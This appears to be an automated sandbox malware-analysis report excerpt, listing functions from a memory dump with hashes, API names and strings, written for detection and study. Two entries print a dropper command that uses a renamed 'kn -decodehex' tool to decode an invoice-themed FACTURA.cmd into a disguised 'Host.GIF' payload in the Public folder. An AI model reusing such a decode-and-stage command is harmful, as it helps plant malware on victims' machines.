                                                                                      • Instruction ID: e034a9504fcadbb17c3f25d3a1770b9051185321dd3d258ecbbfe922386569e7
                                                                                      • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                      • Instruction Fuzzy Hash: 8BF0E921B0978240EEA49B66B58516992959F4CBF0F888335EF7D57BC5DE3CD4528300

                                                                                      Non-executed Functions

                                                                                      Function 00007FF793743410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                      • String ID: $Application$System
                                                                                      • API String ID: 3538039442-1881496484
                                                                                      • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                      • Instruction ID: 0aeadd0e71097cda11c0d88950ad68ae6fc8a5250771feff5d6a13902adea364
                                                                                      • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                      • Instruction Fuzzy Hash: A651BD32A08B4186F7B09B25B4946BAFAA9FB8DB45F848134DA4E13754DF3CD505CB60
                                                                                      Function 00007FF79374B0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_osfhandlememset$wcschr
                                                                                      • String ID: DPATH
                                                                                      • API String ID: 3260997497-2010427443
                                                                                      • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                      • Instruction ID: 56abcf3d01fb6dc99153e7a919538b5850c85b44bf6000d9ac18d83a7842ac6c
                                                                                      • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                      • Instruction Fuzzy Hash: 0CD19022A0864286FBB4AB75D4842BDA2A9FF4CB54F844236D95E677D4DF3CF841C360
                                                                                      Function 00007FF793757FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                      • String ID: @P
                                                                                      • API String ID: 1801357106-3670739982
                                                                                      • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                      • Instruction ID: 07a310ec3385f6090517ae5a75bc55b505680dcf7c1cc1ddd5d139ec852559d9
                                                                                      • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                      • Instruction Fuzzy Hash: 7A415B32B04A45DBE760AF71D4903EDABA4FB8D749F848235DA0E62A88DF78D504C760
                                                                                      Function 00007FF79376AC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValue$CreateDeleteOpen
                                                                                      • String ID: %s=%s$\Shell\Open\Command
                                                                                      • API String ID: 4081037667-3301834661
                                                                                      • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                      • Instruction ID: c85f29e33077a8ae4b0a206c57708b77cc62c0eebc171386298c5fff59c74b30
                                                                                      • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                      • Instruction Fuzzy Hash: B371A6B1B09B4282FAF06B35A0A02B9E299FF4D759FC44131DA4E27794DF3CD5458722
                                                                                      Function 00007FF793741884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmpwcsrchr
                                                                                      • String ID: COPYCMD
                                                                                      • API String ID: 2429825313-3727491224
                                                                                      • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                      • Instruction ID: 0f49e07b447f92b0ccabdd9ae49eddcaa90ef7d20f2cd443f013990cffafee3f
                                                                                      • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                      • Instruction Fuzzy Hash: DEF19322F0C64286FBB0BF7190D41BDA6AAAB0D798F804235DE5E336D4DE3CA551C761
                                                                                      Function 00007FF79376BCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3476366620-0
                                                                                      • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                      • Instruction ID: cdc1dc0ad6f2ad139372249e686a0d83d402bd3af73a861a8234750e8de69f42
                                                                                      • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                      • Instruction Fuzzy Hash: 89212C20908E4296FAB47B3194952B8E6A9FF4E716FC44235C51E763E2DF3CA5058721
                                                                                      Function 00007FF79374F8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF79374F52A,00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F8DE
                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F8FB
                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F951
                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F96B
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374FA8E
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF79374FB14
                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374FB2D
                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374FBEA
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF79374F996
                                                                                        • Part of subcall function 00007FF793750010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF79376849D,?,?,?,00007FF79376F0C7), ref: 00007FF793750045
                                                                                        • Part of subcall function 00007FF793750010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF79376F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF793750071
                                                                                        • Part of subcall function 00007FF793750010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793750092
                                                                                        • Part of subcall function 00007FF793750010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7937500A7
                                                                                        • Part of subcall function 00007FF793750010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF793750181
                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D401
                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D41B
                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D435
                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D480
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                      • String ID: =,;$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
                                                                                      • API String ID: 3964947564-3701919145
                                                                                      • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                      • Instruction ID: 4dea3c7923613abccdd6491e998231a6ebaf1f18d6c0d7ad5f0db015f76b0458
                                                                                      • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                      • Instruction Fuzzy Hash: 02026A21A19A4286FAB8BB31A8C4179E6ADFF4DB55FD44536D90E623A0DF3CB401C731
                                                                                      Function 00007FF79375081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp$EnvironmentVariable
                                                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                      • API String ID: 198002717-267741548
                                                                                      • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                      • Instruction ID: 5263a2895660247c5ef798a28a5fe3f884b47812d10c1880a179b9e411a0a438
                                                                                      • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                      • Instruction Fuzzy Hash: 00510F25A0864385FAB46B31A894279EBA8FF4EB81FC49036C90F63764DF2CE544D771
                                                                                      Function 00007FF79374D3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                      • String ID: "$=,;
                                                                                      • API String ID: 3545743878-4143597401
                                                                                      • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                      • Instruction ID: b2e8960b1b37de8069ba7c188ce3c53e5b98225d36385220c2ea773aaba1f50d
                                                                                      • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                      • Instruction Fuzzy Hash: 75C1B165A0865282FBB57B219488379F6EAFF4DF45F848035CA8E22395EF3CB441C661
                                                                                      Function 00007FF793765BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentFormatMessageThread
                                                                                      • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                      • API String ID: 2411632146-3173542853
                                                                                      • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                      • Instruction ID: 839b4f0b11dd784be5f14a2565ee4eb5a06ecd06e0bc2966d1d6d0ecd16d73fa
                                                                                      • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                      • Instruction Fuzzy Hash: 1C616171A09A4281EAB4EF71A4945B9E3A8FF4CBA8FC40136D94E27758CF3CE5449721
                                                                                      Function 00007FF7937693E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                      • String ID:
                                                                                      • API String ID: 3829876242-3916222277
                                                                                      • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                      • Instruction ID: f74f4187c6f01b74b919726324bf5bc98042b06e2d1198d26df1afce5a0f0dfb
                                                                                      • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                      • Instruction Fuzzy Hash: 3E619431A04A4286E7A4AB21D49427AF6A9FF8DB59F848134DE0E17395DF3CE504CB61
                                                                                      Function 00007FF79374FC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                      • String ID: 0123456789$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
                                                                                      • API String ID: 1606811317-2023537263
                                                                                      • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                      • Instruction ID: 6a11af5e192d5167642d07bf9d92b74f989022096ea8c97ab3a2c47d625a1273
                                                                                      • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                      • Instruction Fuzzy Hash: 1FD1A121A08A4282F6B4AB35A8C4279A7A9FF49790FC44136DE5D637A5DF3CE506C720
                                                                                      Function 00007FF7937703AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ErrorLast$InformationVolume
                                                                                      • String ID: %04X-%04X$~
                                                                                      • API String ID: 2748242238-2468825380
                                                                                      • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
